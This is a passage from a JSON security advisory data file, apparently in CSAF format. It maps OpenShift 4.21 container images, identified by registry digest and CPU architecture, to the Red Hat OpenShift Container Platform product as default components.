"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
